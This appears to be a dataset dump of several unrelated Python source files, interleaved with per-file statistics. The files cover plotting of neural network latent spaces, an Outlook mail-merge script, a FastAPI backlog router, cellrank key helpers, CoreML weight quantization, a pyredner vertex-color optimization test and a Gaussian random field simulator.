    def __init__(self, args, model):
        self.plot_method = 'Li'
        self.gif_axlist = []
        self.clist = ['r', 'g', 'b', 'y', 'm', 'c', 'k', 'pink', 'lightblue', 'lightgreen', 'grey']
        self.fig, self.ax = plt.subplots()
        self.his_loss = None
        self.NetworkStructure = args['NetworkStructure']
        self.current_subfig_index = 2
        self.plot_every_epoch = args['PlotForloop']
        self.infor_index_list = model.plot_index_list
        self.name_list = model.name_list
        self.num_subfig = len(model.plot_index_list)
        self.layer_num = len(args['NetworkStructure']) - 1

        if self.plot_method == 'Zang':
            self.num_fig_every_row = int(np.sqrt(self.num_subfig)) + 1
            self.num_row = int(1 + (self.num_subfig - 0.5) // self.num_fig_every_row)
            self.sub_position_list = [i + 1 for i in range(self.num_subfig)]
        if self.plot_method == 'Li':
            self.num_fig_every_row = 2
            self.num_row = int(1 + (self.num_subfig - 0.5) // self.num_fig_every_row)
            self.sub_position_list = [i * 2 + 1 for i in range(self.num_subfig // 2)] + \
                [self.num_subfig] + \
                list(reversed([i * 2 + 2 for i in range(self.num_subfig // 2)]))

    def PlotOtherLayer(self, fig, data, label, title='', fig_position0=1, fig_position1=1, fig_position2=1, s=8):
        from sklearn.decomposition import PCA
        # input(fig_position)
        color_list = []
        for i in range(label.shape[0]):
            color_list.append(int(label[i]))

        if data.shape[1] > 3:
            pca = PCA(n_components=2)
            try:
                data_em = pca.fit_transform(data)
            except:
                print("Error in plot latent space: PCA.")
                data_max = np.max(data) if np.max(data) < 1e30 else 1e30
                data_min = np.min(data) if np.min(data) > 1e-5 else 1e-2
                data -= data_min
                data /= data_max
                data_em = pca.fit_transform(data)
        else:
            data_em = data

        data_em = data_em - data_em.mean(axis=0)

        if data_em.shape[1] == 3:
            ax = fig.add_subplot(fig_position0, fig_position1, fig_position2, projection='3d')
            ax.scatter(data_em[:, 0], data_em[:, 1], data_em[:, 2], c=color_list, s=s, cmap='rainbow')
        if data_em.shape[1] == 2:
            ax = fig.add_subplot(fig_position0, fig_position1, fig_position2)
            ax.scatter(data_em[:, 0], data_em[:, 1], c=label, s=s, cmap='rainbow')

        plt.axis('equal')
        plt.title(title)
        self.current_subfig_index = self.current_subfig_index + 1

    def update_loss(self, loss=None):
        """ 0721, append loss list """
        if self.his_loss is None and loss is not None:
            self.his_loss = [[] for i in range(len(loss))]
        elif loss is not None:
            for i, loss_item in enumerate(loss):
                self.his_loss[i].append(loss_item)

    def AddNewFig(self, output_info, label_point, loss=None, title_='', save=True):
        self.update_loss(loss)
        self.current_subfig_index = 1
        fig = plt.figure(figsize=(5 * self.num_fig_every_row, 5 * self.num_row))

        for i, index in enumerate(self.infor_index_list):
            self.PlotOtherLayer(
                fig, output_info[index], label_point,
                title=self.name_list[index],
                fig_position0=self.num_row,
                fig_position1=self.num_fig_every_row,
                fig_position2=int(self.sub_position_list[i]))

        if loss is not None:
            loss_interval = 200
            loss_sum = []
            for i in range(len(self.his_loss[1])):
                tmp = 0
                for j in range(len(self.his_loss)):
                    try:
                        tmp += self.his_loss[j][i]
                    except:
                        pass
                loss_sum.append(tmp)

            # add new subplot
            ax = fig.add_subplot(self.num_row, self.num_fig_every_row,
                                 int(max(self.sub_position_list)) + 1)
            l1, = ax.plot([i * loss_interval for i in range(len(self.his_loss[0]))], self.his_loss[0], 'bo-')
            l2, = ax.plot([i * loss_interval for i in range(len(self.his_loss[0]))], self.his_loss[1], 'ko-')
            l3, = ax.plot([i * loss_interval for i in range(len(self.his_loss[0]))], self.his_loss[2], 'yo-')
            l4, = ax.plot([i * loss_interval for i in range(len(self.his_loss[0]))], self.his_loss[3], 'ro-')
            l5, = ax.plot([i * loss_interval for i in range(len(self.his_loss[0]))], self.his_loss[4], 'mo-')
            l6, = ax.plot([i * loss_interval for i in range(len(self.his_loss[0]))], self.his_loss[5], 'go-')
            l7, = ax.plot([i * loss_interval for i in range(len(self.his_loss[0]))], loss_sum, 'co-')
            ax.legend((l1, l2, l3, l4, l5, l6, l7),
                      ('dis', 'push', 'ang', 'orth', 'pad', 'ae', 'sum'))  # loss
            plt.title('loss history')

        plt.tight_layout()
        if save:
            plt.savefig(title_ + '.png', dpi=300)
        plt.close()

    def SaveGIF(self, path):
        gif_images_path = os.listdir(path + '/')
        gif_images_path.sort()
        print(gif_images_path)
        gif_images = []
        for _, path_ in enumerate(gif_images_path):
            print(path_)
            if '.png' in path_:
                # print(path+'/'+path_)
                gif_images.append(imageio.imread(path + '/' + path_))
        imageio.mimsave(path + '/' + "latent.gif", gif_images, fps=10)
37.230769
84
0.508423
808
6,292
3.748762
0.215347
0.04622
0.072631
0.04721
0.369759
0.295807
0.252228
0.252228
0.203698
0.203698
0
0.026131
0.367451
6,292
168
85
37.452381
0.734925
0.013827
0
0.138686
0
0
0.034544
0
0
0
0
0
0
1
0.036496
false
0.007299
0.036496
0
0.080292
0.021898
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8226023cb3139084f438cf9dfe3adae050279971
1,336
py
Python
violet.py
MasayukiTanaka0412/violet
9bc5bfab83902e6798e3b9ef679757f6cd58f900
[ "MIT" ]
null
null
null
violet.py
MasayukiTanaka0412/violet
9bc5bfab83902e6798e3b9ef679757f6cd58f900
[ "MIT" ]
null
null
null
violet.py
MasayukiTanaka0412/violet
9bc5bfab83902e6798e3b9ef679757f6cd58f900
[ "MIT" ]
null
null
null
import logging
import os

import win32com.client
import pandas as pd

logging.basicConfig(level=logging.INFO)

templateName = "Template.msg"
recipientsFile = "Recipients.xlsx"

logging.info('Violet App Start')

path = os.getcwd()
logging.info('Current Directory {}'.format(path))

outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace("MAPI")
mail = outlook.OpenSharedItem(os.path.join(path, templateName))
logging.info("Subject: {}".format(mail.subject))
logging.info("Body: {}".format(mail.HTMLBody))
originalBody = mail.HTMLBody

df = pd.read_excel(os.path.join(path, recipientsFile), sheet_name='Recipients')
logging.info(df)

outputDir = os.path.join(path, 'output')
if not os.path.isdir(outputDir):
    os.mkdir(outputDir)

for index, row in df.iterrows():
    replacedBody = originalBody
    recipient = ""
    for indexName in row.index:
        logging.info("indexName {}".format(indexName))
        if indexName == "TO":
            mail.Recipients.Add(row[indexName])
            recipient = row[indexName]
        else:
            replacedBody = replacedBody.replace(indexName, row[indexName])
    mail.HTMLBody = replacedBody
    mail.SaveAs(os.path.join(outputDir, "{}.msg".format(recipient.replace("@", "_"))))
    mail.Recipients.Remove(1)

logging.info('Violet App End')
29.688889
85
0.68488
156
1,336
5.846154
0.416667
0.096491
0.04386
0.046053
0
0
0
0
0
0
0
0.004517
0.171407
1,336
45
86
29.688889
0.819332
0
0
0
0
0
0.116009
0
0
0
0
0
0
1
0
false
0
0.117647
0
0.117647
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8226308b8a2c2e852acb6dff9db13ef1f87ee5ed
1,409
py
Python
app/routers/backlog.py
cristianwebber/FastApiTest
fe3c782bc4a3e9ff1e9ef5a38f20043f9577bd5e
[ "Apache-2.0" ]
null
null
null
app/routers/backlog.py
cristianwebber/FastApiTest
fe3c782bc4a3e9ff1e9ef5a38f20043f9577bd5e
[ "Apache-2.0" ]
null
null
null
app/routers/backlog.py
cristianwebber/FastApiTest
fe3c782bc4a3e9ff1e9ef5a38f20043f9577bd5e
[ "Apache-2.0" ]
null
null
null
from typing import List

from fastapi import APIRouter, Depends, status
from sqlalchemy.orm import Session

from .. import database, schemas, models, oauth2
from ..repository import backlog

router = APIRouter(prefix="/backlog", tags=["Backlog"])

get_db = database.get_db


@router.get("/", response_model=List[schemas.Backlog])
def get_all(db: Session = Depends(get_db)):
    return backlog.get_all(db)


@router.get("/{id}", status_code=200, response_model=schemas.Backlog)
def get(
    id: int,
    db: Session = Depends(get_db),
    current_user: schemas.User = Depends(oauth2.get_current_user)
):
    return backlog.get(id, db)


@router.post("/", status_code=status.HTTP_201_CREATED)
def create(
    request: schemas.Backlog,
    db: Session = Depends(get_db),
    current_user: schemas.User = Depends(oauth2.get_current_user)
):
    return backlog.create(request, db)


@router.delete("/{id}", status_code=status.HTTP_204_NO_CONTENT)
def destroy(
    id: int,
    db: Session = Depends(get_db),
    current_user: schemas.User = Depends(oauth2.get_current_user),
):
    return backlog.destroy(id, db)


@router.put("/{id}", status_code=status.HTTP_202_ACCEPTED)
def update(
    id: int,
    request: schemas.Backlog,
    db: Session = Depends(get_db),
    current_user: schemas.User = Depends(oauth2.get_current_user),
):
    return backlog.update(id, request, db)
24.719298
69
0.71895
194
1,409
5.046392
0.247423
0.089888
0.081716
0.097038
0.458631
0.392237
0.392237
0.392237
0.392237
0.392237
0
0.014226
0.151881
1,409
56
70
25.160714
0.805021
0
0
0.414634
0
0
0.022776
0
0
0
0
0
0
1
0.121951
false
0
0.146341
0.121951
0.390244
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
82270abb34448de1d28c848049ee656003285eab
2,902
py
Python
cellrank/_key.py
WeilerP/cellrank
c8c2b9f6bd2448861fb414435aee7620ca5a0bad
[ "BSD-3-Clause" ]
172
2020-03-19T19:50:53.000Z
2022-03-28T09:36:04.000Z
cellrank/_key.py
WeilerP/cellrank
c8c2b9f6bd2448861fb414435aee7620ca5a0bad
[ "BSD-3-Clause" ]
702
2020-03-19T08:09:04.000Z
2022-03-30T09:55:14.000Z
cellrank/_key.py
WeilerP/cellrank
c8c2b9f6bd2448861fb414435aee7620ca5a0bad
[ "BSD-3-Clause" ]
17
2020-04-07T03:11:02.000Z
2022-02-02T20:39:16.000Z
from typing import Any, Callable, Optional


class cprop:
    """Class property."""

    def __init__(self, f: Callable[..., str]):
        self.f = f

    def __get__(self, obj: Any, owner: Any) -> str:
        return self.f(owner)


class Key:
    """Class which manages keys in :class:`anndata.AnnData`."""

    @classmethod
    def backward(cls, bwd: bool) -> str:
        return "bwd" if bwd else "fwd"

    @classmethod
    def where(cls, bwd: bool) -> str:
        return "from" if bwd else "to"

    @classmethod
    def initial(cls, bwd: bool) -> str:
        return "initial" if bwd else "terminal"

    @classmethod
    def cytotrace(cls, key: str) -> str:
        return f"ct_{key}"

    class obs:
        @classmethod
        def probs(cls, key: str) -> str:
            return f"{key}_probs"

        @classmethod
        def macrostates(cls, bwd: bool) -> str:
            return f"macrostates_{Key.backward(bwd)}"

        @classmethod
        def term_states(cls, bwd: bool) -> str:
            return f"{Key.initial(bwd)}_states"

        @classmethod
        def priming_degree(cls, bwd: bool) -> str:
            return f"priming_degree_{Key.backward(bwd)}"

    class obsm:
        @classmethod
        def memberships(cls, key: str) -> str:
            return f"{key}_memberships"

        @classmethod
        def schur_vectors(cls, bwd: bool) -> str:
            return f"schur_vectors_{Key.backward(bwd)}"

        @classmethod
        def macrostates(cls, bwd: bool) -> str:
            return f"macrostates_{Key.backward(bwd)}"

        @classmethod
        def abs_probs(cls, bwd: bool) -> str:
            return ("from" if bwd else "to") + "_" + Key.obs.term_states(bwd)

        @classmethod
        def abs_times(cls, bwd: bool) -> str:
            return f"absorption_times_{Key.backward(bwd)}"

    class varm:
        @classmethod
        def lineage_drivers(cls, bwd: bool):
            return ("initial" if bwd else "terminal") + "_lineage_drivers"

    class uns:
        @classmethod
        def kernel(cls, bwd: bool, key: Optional[str] = None) -> str:
            return key if key is not None else f"T_{Key.backward(bwd)}"

        @classmethod
        def estimator(cls, bwd: bool, key: Optional[str] = None) -> str:
            return key if key is not None else f"{Key.backward(bwd)}_estimator"

        @classmethod
        def names(cls, key: str) -> str:
            return f"{key}_names"

        @classmethod
        def colors(cls, key: str) -> str:
            return f"{key}_colors"

        @classmethod
        def eigen(cls, bwd: bool) -> str:
            return f"eigendecomposition_{Key.backward(bwd)}"

        @classmethod
        def schur_matrix(cls, bwd: bool) -> str:
            return f"schur_matrix_{Key.backward(bwd)}"

        @classmethod
        def coarse(cls, bwd: bool) -> str:
            return f"coarse_{Key.backward(bwd)}"
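Since the Key helpers above are pure string builders, their outputs can be read straight off the return expressions; a minimal check:

# Expected values follow directly from the return expressions above.
assert Key.backward(False) == "fwd"
assert Key.obs.macrostates(bwd=True) == "macrostates_bwd"
assert Key.obsm.abs_probs(bwd=False) == "to_terminal_states"
assert Key.uns.kernel(bwd=False) == "T_fwd"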
27.903846
79
0.567884
351
2,902
4.584046
0.193732
0.117464
0.099441
0.105034
0.497825
0.417029
0.30578
0.220012
0.220012
0.220012
0
0
0.308063
2,902
103
80
28.174757
0.801295
0.023777
0
0.337838
0
0
0.163005
0.119064
0
0
0
0
0
1
0.310811
false
0
0.013514
0.297297
0.702703
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
8227635dd4b63240fd4ce82b0583156b4ea9480c
510
py
Python
Tools/quantize-models.py
mihaip/solving-bee
bd45fa8414e6553e7a974b07bea4bad46183da71
[ "Apache-2.0" ]
2
2020-11-17T14:52:50.000Z
2021-04-04T20:43:40.000Z
Tools/quantize-models.py
mihaip/solving-bee
bd45fa8414e6553e7a974b07bea4bad46183da71
[ "Apache-2.0" ]
null
null
null
Tools/quantize-models.py
mihaip/solving-bee
bd45fa8414e6553e7a974b07bea4bad46183da71
[ "Apache-2.0" ]
1
2021-04-04T23:40:21.000Z
2021-04-04T23:40:21.000Z
#!/usr/local/bin/python3

import coremltools.models
import coremltools.models.neural_network
import os.path

models_dir = os.path.join(os.path.dirname(__file__), "..", "Solving Bee", "Resources")

for model_name in ["LettersModel", "BoardModel"]:
    model_path = os.path.join(models_dir, f"{model_name}.mlmodel")
    model_fp32 = coremltools.models.MLModel(model_path)
    model_fp16 = coremltools.models.neural_network.quantization_utils.quantize_weights(model_fp32, nbits=16)
    model_fp16.save(model_path)
39.230769
108
0.77451
70
510
5.371429
0.5
0.180851
0.12234
0.159574
0
0
0
0
0
0
0
0.023861
0.096078
510
12
109
42.5
0.791757
0.045098
0
0
0
0
0.131687
0
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
8227caa8afc429ee4cb7a62a33c9415eba7a7d1a
4,718
py
Python
tests/test_vertex_color.py
aferrall/redner
be52e4105140f575f153d640ba889eb6e6015616
[ "MIT" ]
1,146
2018-11-11T01:47:18.000Z
2022-03-31T14:11:03.000Z
tests/test_vertex_color.py
Awcrr/redner
b4f57037af26b720d916bbaf26103a3499101a9f
[ "MIT" ]
177
2018-11-13T22:48:25.000Z
2022-03-30T07:19:29.000Z
tests/test_vertex_color.py
Awcrr/redner
b4f57037af26b720d916bbaf26103a3499101a9f
[ "MIT" ]
127
2018-11-11T02:32:17.000Z
2022-03-31T07:24:03.000Z
import pyredner
import redner
import numpy as np
import torch
import math

# Example of optimizing vertex color of a sphere.

# Use GPU if available
pyredner.set_use_gpu(torch.cuda.is_available())

cam = pyredner.Camera(position = torch.tensor([0.0, 0.0, -5.0]),
                      look_at = torch.tensor([0.0, 0.0, 0.0]),
                      up = torch.tensor([0.0, 1.0, 0.0]),
                      fov = torch.tensor([45.0]), # in degree
                      clip_near = 1e-2, # needs to > 0
                      resolution = (256, 256))

# Set "use_vertex_color = True" to use vertex color
mat_vertex_color = pyredner.Material(use_vertex_color = True)
materials = [mat_vertex_color]

vertices, indices, uvs, normals = pyredner.generate_sphere(128, 64)
# For the target we randomize the vertex color.
vertex_color = torch.zeros_like(vertices).uniform_(0.0, 1.0)
shape_sphere = pyredner.Shape(\
    vertices = vertices,
    indices = indices,
    uvs = uvs,
    normals = normals,
    colors = vertex_color, # use the 'colors' field in Shape to store the color
    material_id = 0)
shapes = [shape_sphere]

envmap = pyredner.imread('sunsky.exr')
if pyredner.get_use_gpu():
    envmap = envmap.cuda(device = pyredner.get_device())
envmap = pyredner.EnvironmentMap(envmap)
scene = pyredner.Scene(cam, shapes, materials, [], envmap)

scene_args = pyredner.RenderFunction.serialize_scene(\
    scene = scene,
    num_samples = 256,
    max_bounces = 1,
    channels = [redner.channels.radiance, redner.channels.vertex_color])
render = pyredner.RenderFunction.apply
img = render(0, *scene_args)
img_radiance = img[:, :, :3]
img_vertex_color = img[:, :, 3:]
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/target.exr')
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/target.png')
pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/target_color.png')
target_radiance = pyredner.imread('results/test_vertex_color/target.exr')
if pyredner.get_use_gpu():
    target_radiance = target_radiance.cuda()

# Initial guess. Set to 0.5 for all vertices.
shape_sphere.colors = \
    torch.zeros_like(vertices, device = pyredner.get_device()) + 0.5
shape_sphere.colors.requires_grad = True

# We render both the radiance and the vertex color here.
# The vertex color is only for visualization.
scene_args = pyredner.RenderFunction.serialize_scene(\
    scene = scene,
    num_samples = 256,
    max_bounces = 1,
    channels = [redner.channels.radiance, redner.channels.vertex_color])
img = render(1, *scene_args)
img_radiance = img[:, :, :3]
img_vertex_color = img[:, :, 3:]
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/init.png')
pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/init_color.png')
diff = torch.abs(target_radiance - img_radiance)
pyredner.imwrite(diff.cpu(), 'results/test_vertex_color/init_diff.png')

optimizer = torch.optim.Adam([shape_sphere.colors], lr=1e-2)
for t in range(100):
    print('iteration:', t)
    optimizer.zero_grad()
    scene_args = pyredner.RenderFunction.serialize_scene(\
        scene = scene,
        num_samples = 4,
        max_bounces = 1,
        channels = [redner.channels.radiance, redner.channels.vertex_color])
    img = render(t+1, *scene_args)
    img_radiance = img[:, :, :3]
    img_vertex_color = img[:, :, 3:]
    pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/iter_{}.png'.format(t))
    pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/iter_color_{}.png'.format(t))
    loss = torch.pow(img_radiance - target_radiance, 2).sum()
    print('loss:', loss.item())
    loss.backward()
    optimizer.step()
    # Clamp the data to valid range.
    shape_sphere.colors.data.clamp_(0.0, 1.0)

scene_args = pyredner.RenderFunction.serialize_scene(\
    scene = scene,
    num_samples = 256,
    max_bounces = 1,
    channels = [redner.channels.radiance, redner.channels.vertex_color])
img = render(102, *scene_args)
img_radiance = img[:, :, :3]
img_vertex_color = img[:, :, 3:]
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/final.exr')
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/final.png')
pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/final_color.png')
pyredner.imwrite(torch.abs(target_radiance - img_radiance).cpu(), 'results/test_vertex_color/final_diff.png')

from subprocess import call
call(["ffmpeg", "-framerate", "24", "-i",
      "results/test_vertex_color/iter_%d.png", "-vb", "20M",
      "results/test_vertex_color/out.mp4"])
call(["ffmpeg", "-framerate", "24", "-i",
      "results/test_vertex_color/iter_color_%d.png", "-vb", "20M",
      "results/test_vertex_color/out_color.mp4"])
39.983051
109
0.708563
658
4,718
4.867781
0.218845
0.137371
0.090228
0.116766
0.536684
0.53606
0.466438
0.466438
0.453637
0.432407
0
0.022989
0.151759
4,718
118
110
39.983051
0.777361
0.087325
0
0.319588
0
0
0.168335
0.150407
0
0
0
0
0
1
0
false
0
0.061856
0
0.061856
0.020619
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8227d244a3f5042b87acfe74836b3be3d5794b53
10,066
py
Python
starterlite/simulation/GRF.py
gjsun/starterlite
4838c0b9837e0012157596984f9e39ed52f9c86c
[ "MIT" ]
null
null
null
starterlite/simulation/GRF.py
gjsun/starterlite
4838c0b9837e0012157596984f9e39ed52f9c86c
[ "MIT" ]
null
null
null
starterlite/simulation/GRF.py
gjsun/starterlite
4838c0b9837e0012157596984f9e39ed52f9c86c
[ "MIT" ]
null
null
null
import numpy as np
import os

from ..analysis import Sensitivity
from ..physics import Cosmology
from ..physics.Constants import c, cm_per_mpc
from ..util.ParameterFile import ParameterFile
from .FourierSpace import FourierSpace

"""
------------
Instructions
------------
The GRF module allows the user to generate realizations of a Gaussian random field with an input power spectrum,
and compute power spectrum from a given map of fluctuations in real space. This module has benefited a lot from
the imapper2 package developed by Tony Li.
"""


class GaussianRandomField(FourierSpace):
    def __init__(self, **kwargs):
        FourierSpace.__init__(self, **kwargs)
        self.pf = ParameterFile(**kwargs)
        # Get the redshift of the interested signal
        self._z = self.pf.grf_params['grf_z_signal']
        # Specify the survey geometry
        self._survey_goemetry = np.array([self.pf.grf_params['grf_geom_x'],
                                          self.pf.grf_params['grf_geom_y'],
                                          self.pf.grf_params['grf_geom_z']])
        # Get the wavelength [cm] of the interested signal
        self.wv_signal = self.pf.grf_params['grf_lambda_signal']
        # Get the assumed aperture size (diameter) of dish
        self.d_ap = self.pf.grf_params['grf_d_ap']
        self._powerspectrum_in = self.pf.grf_params['grf_ps_in']

    @property
    def cosm(self):
        if not hasattr(self, '_cosm'):
            self._cosm = Cosmology(
                omega_m_0=self.pf.cosmo_params['omega_m_0'],
                omega_l_0=self.pf.cosmo_params['omega_l_0'],
                omega_b_0=self.pf.cosmo_params['omega_b_0'],
                hubble_0=self.pf.cosmo_params['hubble_0'],
                helium_by_number=self.pf.cosmo_params['helium_by_number'],
                cmb_temp_0=self.pf.cosmo_params['cmb_temp_0'],
                approx_highz=self.pf.cosmo_params['approx_highz'],
                sigma_8=self.pf.cosmo_params['sigma_8'],
                primordial_index=self.pf.cosmo_params['primordial_index'])
        return self._cosm

    @property
    def sens(self, **kwargs):
        if not hasattr(self, '_sens'):
            self._sens = Sensitivity(**kwargs)
        return self._sens

    @property
    def z(self):
        if not hasattr(self, '_z'):
            raise ValueError('must specify a redshift for which the fluctuations of target signal will be simulated!')
        return self._z

    @z.setter
    def z(self, value):
        if value in [6.0]:
            self._z = value
        else:
            raise ValueError('invalid signal redshift!')

    @property
    def survey_goemetry(self):
        if not hasattr(self, '_survey_goemetry'):
            raise ValueError('must specify a survey geometry for the simulation!')
        return self._survey_goemetry

    @survey_goemetry.setter
    def survey_goemetry(self, value):
        if (np.alltrue(value > 0)) and (np.size(value) == 3):
            self._survey_goemetry = value
            #print 'updated default geometry to %s!'%(self._survey_goemetry)
        else:
            raise ValueError('input survey geometry invalid!')

    @property
    def PowerSpectrum(self):
        if not hasattr(self, '_PowerSpectrum'):
            raise ValueError('To simulate a GRF, must supply an input PS!')
        return self._PowerSpectrum

    @PowerSpectrum.setter
    def PowerSpectrum(self, value):
        if callable(value):
            self._PowerSpectrum = value
        else:
            raise ValueError('Input power spectrum must be a callable function of k!')

    @property
    def n_ch_x(self):
        return self.survey_goemetry[0]

    @property
    def n_ch_y(self):
        return self.survey_goemetry[1]

    @property
    def n_ch_z(self):
        return self.survey_goemetry[2]

    @property
    def n_beam(self):
        return self.survey_goemetry[0] * self.survey_goemetry[1]

    @property
    def n_channel(self):
        return self.survey_goemetry[-1]

    def SetGrid(self, L_x, L_y, L_z):
        """
        Set x (real space) and k (fourier space) grids
        ----------------------------------------
        :param L_x: length of survey volume along 1st dimension; {scalar}
        :param L_y: length of survey volume along 2nd dimension; {scalar}
        :param L_z: length of survey volume along 3rd (LOS) dimension; {scalar}
        :return:
        """
        _lslab_x = L_x
        _lslab_y = L_y
        _lslab_z = L_z
        # Define the large simulation box within which the survey volume is embedded
        _lsim_x = _lsim_y = _lsim_z = _lslab_z   # Mpc h^-1

        _dx = _lslab_x / self.n_ch_x   # Mpc h^-1
        _dy = _lslab_y / self.n_ch_y   # Mpc h^-1
        _dz = _lslab_z / self.n_ch_z   # Mpc h^-1

        self.nx_sim = int(np.round(_lsim_x / _dx))
        self.ny_sim = int(np.round(_lsim_y / _dy))
        self.nz_sim = int(np.round(_lsim_z / _dz))

        self.xs = np.linspace(-self.nx_sim//2 + self.nx_sim%2, self.nx_sim//2 - 1 + self.nx_sim%2, self.nx_sim) * _dx
        self.ys = np.linspace(-self.ny_sim//2 + self.ny_sim%2, self.ny_sim//2 - 1 + self.ny_sim%2, self.ny_sim) * _dy
        self.zs = np.linspace(-self.nz_sim//2 + self.nz_sim%2, self.nz_sim//2 - 1 + self.nz_sim%2, self.nz_sim) * _dz

        self.r = np.sqrt(self.xs[:, np.newaxis, np.newaxis]**2 +
                         self.ys[np.newaxis, :, np.newaxis]**2 +
                         self.zs[np.newaxis, np.newaxis, :]**2)

        sim = np.zeros((self.nx_sim, self.ny_sim, self.nz_sim), float)
        self.npix_cen = self.nx_sim // 2 - 1
        if self.n_ch_y == 1:
            # real-space weighting function
            sim[int(self.npix_cen - (self.n_beam // 2)):int(self.npix_cen + (self.n_beam // 2)), self.npix_cen, 0:] = 1.0
        else:
            raise NotImplementedError('help!')

        _kx = 2*np.pi * np.fft.fftfreq(self.nx_sim, _dx)
        _ky = 2*np.pi * np.fft.fftfreq(self.ny_sim, _dy)
        _kz = 2*np.pi * np.fft.fftfreq(self.nz_sim, _dz)
        _dkx = abs(_kx[1] - _kx[0])
        _dky = abs(_ky[1] - _ky[0])
        _dkz = abs(_kz[1] - _kz[0])

        self.k = np.sqrt(_kx[:, np.newaxis, np.newaxis]**2 +
                         _ky[np.newaxis, :, np.newaxis]**2 +
                         _kz[np.newaxis, np.newaxis, :]**2)

        _box_vol = _lsim_x * _lsim_y * _lsim_z
        _pix_vol = _box_vol / (self.nx_sim * self.ny_sim * self.nz_sim)
        self.scale_factor = np.sqrt(_pix_vol**2 / _box_vol)

    def GenerateGRF(self, L_x, L_y, L_z, n_samples=1):
        """
        Generate Gaussian random field according to the provided geometry and power spectrum
        ----------------------------------------
        :param L_x: length of survey volume along 1st dimension; {scalar}
        :param L_y: length of survey volume along 2nd dimension; {scalar}
        :param L_z: length of survey volume along 3rd (LOS) dimension; {scalar}
        :param n_samples: number of GRF realizations to generate
        :return:
        """
        self.fn = 'grf_samples_x%dy%dz%d_N%d' % (self.n_ch_x, self.n_ch_y, self.n_ch_z, n_samples)

        if not callable(self.PowerSpectrum):
            raise TypeError('Input power spectrum must be a callable function of k!')

        self.survey_maps = np.zeros((self.n_ch_x, self.n_ch_y, self.n_ch_z, n_samples))

        print('\nGenerating x (real space) and k (fourier space) grids...')
        self.SetGrid(L_x=L_x, L_y=L_y, L_z=L_z)

        print('\nReading in power spectrum...')
        try:
            Pk = self.PowerSpectrum(self.k)
            assert Pk[Pk >= 0.0].size == Pk.size
        except:
            raise ValueError('Oops!')

        print('\nGenerating GRF realizations...')
        if self.n_ch_y == 1:
            for i in range(n_samples):
                # Generate real and imaginary parts
                rand = np.random.RandomState(seed=(42 + i))
                realspace_vec_r = rand.normal(loc=0.0, scale=1.0, size=self.r.shape)
                realspace_vec_i = rand.normal(loc=0.0, scale=1.0, size=self.r.shape)
                realspace_map = (realspace_vec_r + realspace_vec_i * 1.0j)
                fourierspace_map = np.fft.fftn(realspace_map) / np.sqrt(self.nx_sim * self.ny_sim * self.nz_sim)
                ft_map = np.sqrt(Pk) * fourierspace_map / self.scale_factor
                ft_map[0, 0, 0] = 0.0
                full_map = np.fft.ifftn(ft_map)
                full_map = np.real(full_map)
                survey_map = full_map[int(self.npix_cen-(self.n_ch_x//2)):int(self.npix_cen+(self.n_ch_x//2)), self.npix_cen, :]
                self.survey_maps[:, 0, :, i] = survey_map
                print('%d out of %d realizations completed!' % (i+1, n_samples))
            self.survey_map_coords = [self.xs[int(self.npix_cen-(self.n_ch_x//2)):int(self.npix_cen+(self.n_ch_x//2))], None, self.zs]
        else:
            raise NotImplementedError('help!')

        self.save()
        print('\n--- DONE ---\n')

    def save(self, format='npz'):
        """
        Save derived window functions to file
        ----------------------------------------
        :param format: format of output file; {str}
        """
        _path = os.getenv('STARTERLITE') + '/output/grf/%s.%s' % (self.fn, format)
        _wf_dict = {'grf': self.survey_maps, 'coords': self.survey_map_coords}
        np.savez(_path, **_wf_dict)

    def GetObsPS2D_NoAvg(self, ps3d, T_matrix_path):
        """
        Obtain the observed 2D PS for a given true, 3D PS and a projection (WF) matrix
        ----------------------------------------
        :param ps3d: true spatial power spectrum; {callable function}
        :param T_matrix_path: path to transfer matrix; {str}
        :return: observed power spectrum and bin edges
        """
        T_matrix_data = np.load(T_matrix_path)
        T_matrix = T_matrix_data['T_matrix']   # of size (NKx * NKz, Nkbins)
        k3d_bins = T_matrix_data['k3d_bins']
        K2D_bins = T_matrix_data['K2D_matrix']   # of size (NKx * NKz, 2)
        PS2D_from_mat = np.matmul(T_matrix, ps3d(k3d_bins))
        return K2D_bins, PS2D_from_mat
36.078853
137
0.597457
1,441
10,066
3.932686
0.195697
0.009529
0.018528
0.026998
0.344627
0.256397
0.198165
0.16252
0.127228
0.112935
0
0.015481
0.268428
10,066
279
138
36.078853
0.754074
0.154878
0
0.119497
0
0
0.104833
0.003146
0
0
0
0
0.006289
1
0.113208
false
0
0.044025
0.031447
0.232704
0.031447
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8229233dd2ae5f0912a4213d1c4e8a168847a08a
3,679
py
Python
botpumpkin/discord/context.py
Anthrasite/BotPumpkin
99267a9cb3d263f5cd302ee548c49c59fafcce3f
